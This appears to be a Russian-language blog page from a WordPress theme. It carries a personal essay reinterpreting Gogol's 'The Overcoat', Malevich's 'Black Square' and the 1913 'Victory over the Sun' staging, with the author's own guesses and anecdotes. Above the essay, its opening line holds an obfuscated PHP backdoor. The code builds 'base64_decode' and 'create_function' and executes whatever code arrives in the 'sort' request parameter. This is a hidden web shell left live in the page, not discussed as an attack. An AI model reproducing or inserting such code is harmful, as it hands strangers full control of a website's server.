nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

КАРАУЛ ! РАЗОБЛАЧАЮТ !


эпиграф
В С Е   Т А К    Г О В О Р И Л И   . . .
Я   ДАЛЁК  ОТ  УТВЕРЖДЕНИЯ,  БУДТО Т О,  ЧТО   В С Е    ГОВОРЯТ,
НЕПРЕМЕННО   П Р А В Д А . В С Е НЕРЕДКО  И   ОШИБАЮТСЯ.
КАК   ПОКАЗЫВАЕТ  ОПЫТ  ЧЕЛОВЕЧЕСТВА,  ЭТИ  САМЫЕ   В С Е
ТАК  ЧАСТО  ОШИБАЛИСЬ,  И   ПОРОЙ  ТАК  НЕ  СКОРО  УДАВАЛОСЬ
ПОНЯТЬ  ВСЮ  ГЛУБИНУ  ИХ  ОШИБКИ, ЧТО  ЭТОМУ   АВТОРИТЕТУ
БОЛЬШЕ  НЕ  СЛЕДУЕТ  ДОВЕРЯТЬ. В С Е  МОГУТ  БЫТЬ  И   ПРАВЫ.
"НО  ЭТО  НЕ  ЗАКОН", – КАК  ГОВОРИТ  ПРИЗРАК  ДЖАЙЛСА  СКРОГГИНСА
В  ИЗВЕСТНОЙ  БАЛЛАДЕ.
ГРОЗНОЕ   СЛОВО П Р И З Р А К   БУДИТ  ВО  МНЕ   ВОСПОМИНАНИЯ.
                                                Чарльз  Диккенс " Одержимый  или  Сделка  с  призраком "  (1848 г.)

           Воспользуемся   смехотворной  математической  лексикой:   пусть, допустим, предположим,  условимся, примем  за, обозначим,  отметим, сократим, вынесем  в / за скобки . . .
        Скажем  так:   д о п у с т и м ,  что    Башмачкина   я  окончательно  р а з о б л а ч и л а ,  как  и  коломенские  бандиты  его   разоблачили  в  прямом  и  переносном  смысле  этого слова. Ибо  " р а з о б л а ч и т ь " –  это  и  раздеть,  а  также   выявить  правду  жизни –  и  всё  это  в   одном  слове !
        Для    р а з д в о е н н о с т и    личности  Башмачкина   имеется   установленная   квалификация :  " богач – бедняк ", " скупой  рыцарь",  скупердяй.
        Немного  повторюсь.
       " Бедный "  Башмачкин  был  одиноким,  не  обременённым семьёй   т и т у л я р н ы м   с о в е т н и к о м ?  Пардон,  но  этот  чин  титуловался  как  "  В А Ш Е   Б Л А Г О Р О Д И Е  " ! Например, Даргомыжский  и  Герцен  были  титулярными  советниками,  а  также  Пушкин  недолгое  время,  когда  окончил  лицей; а  Мусоргский  себе  на  хлеб  зарабатывал  ( и  попивал ),  быв  рангом  повыше  –  коллежским  ассестором !
      Получать    400  рублей  в год  –  это  же  весьма  неплохие  деньги  по  раскладу  того  времени  –  я  уже  писала  об  этом.  Плюс  к  этим  деньгам,  если  как  он,   ещё  и  " похалтуривать ",  беря  заказы  по переписыванию  бумаг  на  досуге  дома, так  это  вообще  –  " кайф "  трудоголика !
        Жить  в  дискомфорте,  как  Башмачкин  при  его  состоятельности ?  Ну  и  что ? У  вас,  наверняка,  у  всех  есть  в  знакомых  такие  подпольные " Корейки "   Вон  мой всеми  обожаемый  муж  и   моя  милая  мамочка,  да  и  свекровь,  надо  сказать,  просто  обожали  дискомфорт   и   при  своей  жизни  не  замечали  и   даже  с  презрением  относились  к   плодам   комфортной  цивилизации !   Это  –  один   из    людских   т и п о в ,  медицински  говоря,  даже   человеческая   " патология  характера,  переходящая  в    з а б о л е в а н и е ",  что  и  произошло  с  Башмачкиным !  А   как  известно  "  царство,   разделившееся  в   себе,   не   устоит ! "
           Мы   думаем   о  себе  ( что  и  есть  на  самом  деле ): " мы   сами  с   усами "  –  и   в   то  же  время  исповедуем  противоположное:  что   " мы    в с е   вышли  из   гоголевской  " Шинели "" –  так  нас  учили  в  школе  сразу   именно  этим   противоположным   константам  ( и   про  усы,  и  про  шинель ).  Однако,  смею  отредактировать  известную  пословицу :

П О    О Д Ё Ж К Е    В С Т Р Е Ч А Ю Т    –    П О    У С А М    П Р О В О Ж А Ю Т  !    До   ума   ещё   далеко !

               Казалось  бы,  неглупые  литературоеды  более  ста  лет,  как   ополовинили  эту  пословицу  –  только  то  и   оставили,  что  " по  одёжке  встречают "  –  таким   образом,  и   самих  себя   дали "  провести  на  мякине "  ловкому   политику  ( В о г ю э ),  и   нас  этой  мякиной   накормить. А   потому  что  всегда  на  половине  мысли  останавливаются  по  своей   гуманитарности.  А  надо  точку  ставить  не  только  в  конце   предложения,  но  и  над  всеми   i  .
       Унизить  авангардистскую  " Шинель "   до  слезоточивой  повести  о  маленьком  человеке –  это  ж  надо  ж  умудриться !  Всё  равно  что  смартфоном  орехи  колоть !
       Почему-то   малевичевский   " Чёрный  квадрат ",  превозносимый   одними   и   оспариваемый  другими,  хотя  бы  вызывает  заслуженные  с п о р ы.  Если  поиграть  словами,  то  эти   с п о р ы,   разлетаясь  и  прорастая  в  мозгах,  дают  неожиданные  корни,  ростки  и   плоды,  которые  будоражат  эмоциональную  сферу,  приводят,  наконец,  к   выбору  социальной  позиции:   ты  " про "   или  " контра "   по  отношению  к    р е а л и с т и ч е с к о м у    а б с у р д у ,  который   в о г ю э я м и    методично  загодя  подготовленный,  пышным  цветом    в   мировом   масштабе  "  украшает "  нашу   жизнь   дезинформационными   шоу.
        Сшитая  Гоголем  " Шинель "    с м ы с л о в о   объёмна  и   безразмерна:   она   и
      1) для  советского " блокнота  агитатора"  годна,  и
      2)  для  богословской  критики годна,  потому  что  повесть  по   стилю  –  пародия   на   святоотеческое   смиренное   е в а н г е л ь с к о е   ж и т и е;
      3)  и   праматерью   нашей  литературы-то  является,  и
      4)  в   то   же   время   является   для   неё   же  –  п р о к р у с т о в ы м    ложе !
                        А   также,  как   я   п о к а з а л а   ранее,  повесть  является  пародией  даже  и   на   с у е в е р и е   в   отношении  блуждающего  по  Коломне  " м е д н о г о    а н г е л а ",  который  ночью, отделяясь   с   верха    ворот  тюрьмы  " Литовский  замок ",    б л у ж д а е т,   предвозвещает   казни.
                 Я    написала  слово  " м е д н ы й " –   а   это    ведь   логично  соотносится   с   памятником  " Медный  Всадник ", от  которого,  по  поверью,  Пётр  Первый  отделялся  привидением  и  бродил  рядом  с  Михайловским  з а м к о м.  А   сколько   е щ ё   безвозвратно  ушло   у с т н ы х   метафизических  историй, так  и  не дошедших  до  нас, потому  что  на  них  " своего "  Гоголя   или   Гиляровского,  или   Пыляева   не  нашлось ?  Но  не  превращать  же  традиционно   понимаемый   гоголевский  бытовой   н а т у р а л и з м  " Шинели "   вкупе   с   её   у ф о л о г и ч е с к о й    составляющей  в    н а ц и о н а л ь н у ю     и д е ю !
             А   это   у  ж  е    произошло  благодаря   легендарной   мантре:   мол,   "  м  ы   ( п о в т о р я ю,  чтоб  задумались  – М Ы !)    В С Е   (повторяю  – ВСЕ )   в ы ш л и    из    г о г о л е в с к о й    " Ш и н е л и" " ? ?  Дарвинизм  какой – то   типа   мы   в с е   произошли  от  обезьян. . .
А  сейчас  говорят,  например,  что  у  Дарвина  и   в  помине   такого  тезиса  нет . . . даже  кому  потом  стали  приписывать  эти  слова  –  тот  тоже  ни  при  чём . . .

   Приведу  заморочку  как   " переворот "  слов   и  смысла . –  на  собственном  примере.

         В  нашей  деревенской  школе,  когда  там  учились  наши сыновья,  в  преподавательском  составе  чудесным  образом   превалировал  мужской  контингент  над  женским,  вплоть  до  того, что  учитель  литературы  и  русского  –  аж  профессиональный   писатель !  И  вот  к  нам  любил  захаживать  учитель  истории, идейно  въедливый  и  педантичный, короче,  принципиальный. А   я  тогда  мусировала  одну  свою  мысль, выведенную  из  практики  жизни.  Звучит  она  так:  Я    Н Е    Р А Б А     С В О Е Г О     С Л О В  А  !
          Эта мысль  выстрадалась  и  " по   жизни " ,  и   от  размышлений  о  дне  рождения  царя  Ирода,  сына  Ирода  Великого (  11  сентября  по  новому  стилю ) –  это  православное  поминовение  усекновения  главы  Иоанна  Предтечи,  а  он  в  дальнейшем,  средневековом  европейском  мировоззрении, считался преемником  функций  Апполона,  покровителя  искусств  –  вплоть  до  такой  степени,  что  всем  известная  в  музыке  нота  " СИ "  является аббревиатурой  САНТА   ИОХАННЕС ; а   вообще  гамма  " до ре ми фа соль ля си " –  это  начальные  слоги   стихотворной  молитвы,  к  нему  обращённой !  Так  вот.
         На  дне  рождения  царя  Ирода  девица   Саломея   станцевала,  поразив  Ирода  –  а  я  ведь  тоже  была  балетоманкой  –  поэтому  мне  это  интересно  было  представить  себе. На  этом  празднестве  Ирод    л я п н у л,   что  хоть  полцарства  она, Саломея,  попроси  –  он  за  такое   качественное  хореографическое  исполнение  его  отдаст,  ну,  если  не  хочет  царства,  то  исполнит   вообще  любой  её   каприз. Этот   к а т а р с и с   Ирода  и  великое  послушание  Саломеи  своей  мамочке  определили  дальнейшее  направление   в с е й   цивилизации.
          Эта,  в  общем – то   девочка,  имела  на   сволих   плечах  голову  своей  мамочки !  К   ней-то   она   и  побежала  "  в  рот  смотреть " –  ч т о   та  скажет.  А  мне  и  это  интересно  было  психологически  уяснить, так  как  у меня  именно с  родной  мамочкой  был  смертоубийственный  конфликт,  как  я  о  нём  уже  здесь  писала.
        Эта  легендарная  мамочка  ( Иродиада,  жена  брата  царя  и  любовница   этого  царя)  своей  зомбированной   дочечке  велела  пожелать  иметь  отрезанную  голову  Иоанна  Крестителя,  который   тихо – мирно  сидел  в  каземате,  а  царь  Ирод  посещал  его  своей  милостью  ради  духовных  полемик.  Вариант:  Ирод  и  сам  хотел  прикончить  Иоанна,  но  боялся  народа,  который  чтил  пророка.  Но  один  вариант  другому  не  мешает,  так  как  желание   прикончить  своего  оппонента  у  многих  присутствует !
        Поэтому  Ирод   и  преогорчился  ( или  сделал  вид ),  услышав  вердикт   своей  любовницы   из   уст   её   верной  дочечки ( своей  как  бы  падчерицы).
        Коварная   и  властная  Иродиада  нанесла   и  по  Ироду  удар,  несомненно,  ревнуя  своего  любовника   к   его   задушевному  собеседнику, сама  оттянулась  в  мщении  Крестителю   за  его  осуждение  внебрачной  связи  с  указанным  царём  и   народу  " насолила ",  лишив  народ  любимого  ясновидящего. А   дочку  этим  страшным  преступлением  навсегда  и  окончательно привязала,  как  говорится,  к   своей  юбке.  Прямо  вылитая   моя  мамочка !
              Царь  Ирод   же,  д а в ш и   на   пиршестве   перед  всеми   гостями    с л о в о    исполнить  любое  желание   дочечки  своей   любовницы,  не   с м о г   от  своего  слова  отступисься,  так  как   был   р а б о м   оного  –   царского   –  с л о в а,   а   не  свободным   человеком,  хоть  и  царь. Потрясающая  и  поучительная  история !
      Поэтому  учитель  истории  и  услышал  от  меня  эту  фразу: " Я    Н Е    Р А Б А    С В О Е Г О    С Л О В А ! " –  а   заодно   и  её  предысторию, впечатлившись. Ой,  как   Ашот  Владимирович  возликовал: " Ну  как  же  вы,  матушка,  хорошо  это   сказали,  да  как  интересно,  да   как  здорово ! "
      Прибегает  он  через  несколько  дней  из  школы, что  от  нас  в  двух  шагах,  в   переменку  и  лихорадочно  вопрошает: " Ой,  матушка,  забыл,  забыл  –  всё  вспомнить  не  могу,  как  это  вы  так  лихо  закрутили   тогда  мысль . . .  ну  никак  она  у  меня   в  голове  не  проявляется,  напомните  мне:  вы   как-то  . . .  как-то . . .  этак . . . сказали . . . что – то  наподобие:  Я    Н Е    О Т В Е Ч А Ю    З А   С В О И    С Л О В А ,  но  как – то   п о и з я щ н е е,   что  ли ? "
     Что  на  это  скажешь  –   остаётся  только,  как  говорится,  руками  развести . . .

     Ладно,  вернёмся  к  нашим   квадратам.
     На  " Чёрный  квадрат ",  кстати,  тоже   нашёлся   свой   " в о г ю э "
    Это  –  Александр   Б е н у а :  он  первый   сказал,  что   " Ч ё р н ы й    к в а д р а т "   –   э т о  . . .  и к о н а .  Так   и   пошло .
     А   вот  что  пишет  Википедия  о  первой  выставке  с  "  Чёрным  квадратом ":

        ТРИДЦАТЬ  ДЕВЯТЬ  СУПРЕМАТИЧЕСКИХ   КАРТИН  ЗАНИМАЛИ  ОТДЕЛЬНЫЙ  ЗАЛ   ВЫСТАВКИ.  СРЕДИ  НИХ,  НА   САМОМ  ВИДНОМ   МЕСТЕ,  В  ТАК  НАЗЫВАЕМОМ   " КРАСНОМ  УГЛУ ",  ГДЕ  В  РУССКИХ   ДОМАХ  ОБЫЧНО  ВЕШАЮТ  ИКОНЫ,  ВИСЕЛ   " ЧЁРНЫЙ   КВАДРАТ " .

      Конечно,  так  и  должно  быть  –  эталонная   п л а н к а   в  искусстве  должна  быть  высоко-высоко  в   небесах,  а   каждое  уважающее  себя:
        1)  литературное   произведение невольно  должно  стремиться   к  эффективной  и  эффектной   информативности  ( явной  или  " скрытой " )  –   ведь   Ев-Ангелие   в   переводе  значит  " Б Л А Г А Я   В Е С Т Ь " ;
       2)   ж и в о п и с н о е    и з о б р е т е н и е  = картина   должна  претендовать   на   соперничанье  с  иконой ;
       3)   А   синтез  искусств   театр   –  это   вообще   о б щ е е    д е л о ,  то   есть   ЛИТУРГИЯ;  если  кто  не  знает,  то  знай,  что  в   переводе  " литургия "  и  означает  –  общее  дело !

        Последний  пункт  имеет,  как  и  второй,   прямое  отношение   к   " Чёрному  квадрату ",  так   как   изначально  он   был  э л е м е н т о м   декорации   театрального  действа  под  названием  " Победа   над    с о л н ц е м ", прошедшем  3  и  5  декабря 1913 года  в  Петербурге . . . …………………………….
…………………………………………………..вот   и  не   знаешь,  где  найдёшь  –  где  потеряешь !……………………………………..
        В  Интернете  я   нашла,  что   всего   лишь   д в а    представления " Победы   над   солнцем "  проходили . . .
                                                      ( ура !  концы   с  концами  сошлись ! ) —
                                      —   В    К О Л О М Н Е,  на  ул. ОФИЦЕРСКОЙ, ныне Декабристов  !

         По  своему  названию   названию  Офицерская  улица    происходит  от  тюрьмы  Литовский  замок,  о  котором  я  писала.  Потому  она  и  Офицерская,  что  там квартировались  офицеры.  Происходило   магическое  действо  " Победы   над  солнцем "   в   Л у н а – парке ,  в   Демидовом  саду  ( ещё  его  звали " Д е м и д р о м ".  А   ныне там стадион  института  физкультуры  им.Лесгафта ).  В    Л У Н А  ( ! ) – парке   " КРАХ "   С О Л Н Ц А  ! !

    Надо  всё-таки  здесь   преподнести   ещё   одно  интересное  сведение,  сейчас  раскопанное  мною  в  Интернете.
    Значит,  3  и  5  декабря  1913 года   в  Луна-парке  на  Офицерской  были  даны  скандальные  представления  " Победы  над  солнцем ".
    А   2  и  4  декабря   прошёл   не  менее,  надо  думать,  скандальный  спектакль  под   названием  " Т р а г е д и я     М а я к о в с к о г о "   авторства  . . .  самого   Маяковского !

    И  ещё  страшное  сведение:  Матюшин  воплотил  " корпоративный "  замысел  " Победы  над  солнцем "   через  семь  месяцев  после  смерти  своей  любимой  жены,  Елены  Гуро,  умершей  в начале  мая  1913  года  от  лейкемии . . .

            И   вот  какая   прямая   аналогия  аналогия  с  эпизодом  Священной  историей: после   пролога   спектакля  " Победы  над солнцем ":  занавес-завеса   не  раскрывался,  а   р а з р ы в а л с я    п о п о л а м !
        Доволно  долго  сейчас  над  этим  размышляя,  я  всё-таки  решила  поделиться  с  вами  своей  д о г а д к о й  –   чистой  воды   ф а н т а з и е й (  я  же  не  научный   т р у д   пишу !) . Может,  и  делают  в  таких  случаях  на  компьютерном  письме  "  с н о с к у ",  но  я   просто   этого   ещё   не  умею.  Поэтому,  как  инфузория   туфельки  –  д е л ю с ь .
       В   Интернете ,  проглядывая   историю  " Победы  над  солнцем ",  в  топографическом  обзоре  происхождения  Луна-парка  из  Нарышкинского  сада,  про  само  помещение  театрика  на  момент  скандальной  Матюшкинско – Хлебниковско – Бурлюкско – Гурджиевско (хореограф) – Малевичевской   постановки  там  был   з а н а в е с , который  сладострастно  не  раскрывался,  а   р в а л с я  пополам  –  он  был   работы  Бакста  ( абсолютное  имя  в  театрально – декорационном  искусстве ! ) и  изображал  из  себя   р а й с к и е    сю-сю-ля-ля   к у щ и  .  Это  моя,  повторяю,  догадка,  но  думаю,  что  именно  его  авантюристы-постановщики  и  разрывали  сверху  до  низу, неожиданно   по  контрасту  являя  супрематическое  новшество !  В  третий  раз говорю:  это  моя  личная  догадка:  я  бы  на  их месте  именно  так  бы  и  придумала . . .

             А  что  касается  основной  идеи, вынесенной  в  название  –  "  Победы   н а д   солнцем ",  то   если  в  начале  спектакля  декоративное солнышко  в   верхнем  углу   " зеркала "  сцены  имело   вид  –   как   дети   его   рисуют  –    к р у г а   с  пунктиром   лучиков,  как   бы   из   него  исходящих,  то   в  финале  это  был  уже  без   лучиков  и   символизирующий    п о б е д у   н а д    э т и м    с а м ы м   круглым   с о л н ц е м    ЧЁРНЫЙ   КВАДРАТ  в   виде    геометрической  и   световой   антитезы  " нормальному"  солнышку.
     А  уже  с  1915  года,  после  смерти  от  тифа  единственного  сына  Малевича  –  Анатолия,  " Чёрный   квадрат "   фигурирует  не   как  воспоминание  о столкновении   эстетических   миров   в    Л у н а – парке,  а   как  самостоятельное  живописное  и  концептуальное   произведение,  в  которое  вложена  энергия  мозга  и  живописного  почерка   руки  с  кисточкой,  то  есть  можно  сказать  –   р у к о п и с н о е   издание,   р у к о п и с ь   со  " скрытым "   содержанием . . .

    Однако  реалистичный  прецедент  для   скорбного  взгляда  в  чёрную бездну   К в а з и м и р а  ( извините  мне  эту  игру  слов )  Малевича  был   устроен   без  всякой помпы  ещё  Петровым-Водкиным  лет  за  пятнадцать  до  " Чёрного  квадрата"  и   испробован  на  " подопытных   зрителях ", когда   он, быв   школьником,  на   уроке  н а р и с о в а л   на  бумаге . . . д ы р к у,   и   все,  начиная  от  преподавателя,  приняли  нарисованную  чёрную  дырку  за   н а с т о я щ у ю !

    Однако  ж   и   Интернет   меня  сейчас  поразил. При  всей   его  осведомлённости   я   не   смогла  найти  в   нём  нужных   мне  слов  Максима  Горького,  которые  я  про  себя  очень   часто  произношу.  Я  их   давно – давно   прочитала   в  книге  тридцатых  годов  прошлого  века  под   названием   типа  записки  и  мысли  Горького,  Одна  из  его   мыслей  была  такова:

           С У К И Н    С Ы Н    Я    З А     Т.е. ф а д д е й О ,   Ч Т О     Р И С О В А Т Ь     Н Е    У М Е Ю   !

           Если  этой  мысли  вы,  чего  доброго  пустившись  в  поиски,  не  найдёте  в  собрании  сочинений  Максима  Горького,  то  уж,  сделайте  милость,  п о в е р ь т е    мне   н а    с л о в о:   ну,   что   я    их  не  придумала,  а    действительно   п р о ч и т а л а   в  книге   Алексея   Максимовича !
          И   ещё  одно   краткое   воспоминания  Горького  о  себе  в   той   книге   меня   поразило:  мол,  он   с   детства    в е р и л     абсолютно   каждому   п е ч а т н о м у   с л о в у,  мол,  все   были – небылицы   он   априори   считал   реальностью  –  что  бы  то  ни  было  написано !  К а ж д о е     н а п е ч а т а н н о е    с л о в о    было   для   него  –  с в я щ е н н ы м   (  ну,  было   прямо – таки   " б л а г о й     в е с т ь ю " ! ).
     Так  что  и   вы  извольте  верить   мне.
     Ведь  поверили   же   В о г ю э  !
                                          +
             петр  иоанн  андрей
филипп  фома  варфоломей
               два иакова  матфей
 иуда яковль ,т.е. ф а д д е й
   зилота симон  и  матфИй


Добавить комментарий